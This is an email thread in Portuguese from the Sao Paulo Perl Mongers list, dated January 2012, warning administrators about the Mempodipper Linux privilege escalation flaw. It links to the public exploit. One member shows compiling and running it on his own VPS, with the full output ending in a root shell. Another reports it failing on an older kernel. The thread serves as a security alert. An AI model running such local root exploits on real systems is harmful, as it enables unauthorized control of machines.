<div><br></div>Em<div><br><div>Linux alexeiz 2.6.38-13-generic-pae #53-Ubuntu SMP Mon Nov 28 19:41:58 UTC 2011 i686 i686 i386 GNU/Linux</div><div><br></div><div>nem compila.</div><div><br></div><div>Eu uso muito VMWare, e o suporte aos VMTools e aos módulos que compilam no kernel do Linux para o kernel 3.0 está quebrado (tem uns patches por aí, mas eu não vou compilar kernel agora), então estou usando o 2.6.38 por enquanto.</div>
<div><br></div><div>[]s,</div><div>Russian<br><br><div class="gmail_quote">2012/1/27 Daniel Mantovani <span dir="ltr"><<a href="mailto:daniel.oliveira.mantovani@gmail.com">daniel.oliveira.mantovani@gmail.com</a>></span><br>
<blockquote class="gmail_quote" style="margin:0 0 0 .8ex;border-left:1px #ccc solid;padding-left:1ex"><div style="word-wrap:break-word">Acabei de testar na minha vps,<div><br></div><div><br></div><div><div>mantovani@mantovanilabs:~$ gcc mempodipper.c </div>
<div>mantovani@mantovanilabs:~$ ls</div><div>a.out apps mempodipper.c Perl perl5</div><div>mantovani@mantovanilabs:~$ chmod +x a.out </div><div>mantovani@mantovanilabs:~$ ./a.out </div><div>===============================</div>
<div>= Mempodipper =</div><div>= by zx2c4 =</div><div>= Jan 21, 2012 =</div><div>===============================</div><div><br></div><div>[+] Ptracing su to find next instruction without reading binary.</div>
<div>[+] Creating ptrace pipe.</div><div>[+] Forking ptrace child.</div><div>[+] Waiting for ptraced child to give output on syscalls.</div><div>[+] Ptrace_traceme'ing process.</div><div>[+] Error message written. Single stepping to find address.</div>
<div>[+] Resolved call address to 0x4020b8.</div><div>[+] Opening socketpair.</div><div>[+] Waiting for transferred fd in parent.</div><div>[+] Executing child from child fork.</div><div>[+] Opening parent mem /proc/16574/mem in child.</div>
<div>[+] Sending fd 6 to parent.</div><div>[+] Received fd at 6.</div><div>[+] Assigning fd 6 to stderr.</div><div>[+] Calculating su padding.</div><div>[+] Seeking to offset 0x4020ac.</div><div>[+] Executing su with shellcode.</div>
<div># uname -a</div><div>Linux <a href="http://mantovanilabs.com" target="_blank">mantovanilabs.com</a> 3.0.4-x86_64-linode21 #1 SMP Thu Sep 1 21:28:01 EDT 2011 x86_64 GNU/Linux</div><div class="im"><div><br></div><div>
<div style="word-wrap:break-word"><span style="text-indent:0px;letter-spacing:normal;font-variant:normal;text-align:-webkit-auto;font-style:normal;font-weight:normal;line-height:normal;border-collapse:separate;text-transform:none;font-size:medium;white-space:normal;font-family:Helvetica;word-spacing:0px"><div style="word-wrap:break-word">
-- <br>Software Engineer<br>Just Another Perl Hacker<br>Daniel Mantovani +5511 8538-9897<br>XOXO</div></span></div>
</div>
<br></div><div><div class="h5"><div><div>On Jan 27, 2012, at 12:02 PM, Daniel Mantovani wrote:</div><br><blockquote type="cite"><div style="word-wrap:break-word"><div><a href="http://www.techworld.com.au/article/413300/linux_vendors_rush_patch_privilege_escalation_flaw_after_root_exploits_emerge" target="_blank">http://www.techworld.com.au/article/413300/linux_vendors_rush_patch_privilege_escalation_flaw_after_root_exploits_emerge</a></div>
<div>o exploit, <a href="http://www.exploit-db.com/exploits/18411/" target="_blank">http://www.exploit-db.com/exploits/18411/</a></div><div><br></div><div>Atencao administradores, o assunto 'e serio.</div><div><br></div>
<br><div>
<div style="word-wrap:break-word"><div style="word-wrap:break-word">-- <br>Software Engineer<br>Just Another Perl Hacker<br>Daniel Mantovani +5511 8538-9897<br>XOXO</div></div>
</div>
<br></div></blockquote></div><br></div></div></div></div><br>=begin disclaimer<br>
Sao Paulo Perl Mongers: <a href="http://sao-paulo.pm.org/" target="_blank">http://sao-paulo.pm.org/</a><br>
SaoPaulo-pm mailing list: <a href="mailto:SaoPaulo-pm@pm.org">SaoPaulo-pm@pm.org</a><br>
L<<a href="http://mail.pm.org/mailman/listinfo/saopaulo-pm" target="_blank">http://mail.pm.org/mailman/listinfo/saopaulo-pm</a>><br>
=end disclaimer<br>
<br></blockquote></div><br><br clear="all"><div><br></div>-- <br>Alexei "RUSSOZ" Znamensky | russoz EM gmail com | <a href="http://russoz.org" target="_blank">http://russoz.org</a><br>GPG fingerprint = 42AB E78C B83A AE31 7D27 1CF3 C66F B5C7 71CA 9F3C<br>
<a href="http://www.flickr.com/photos/alexeiz" target="_blank">http://www.flickr.com/photos/alexeiz</a> | <a href="http://github.com/russoz" target="_blank">http://github.com/russoz</a><br>"I don't know... fly casual!" -- Han Solo<br>
</div></div>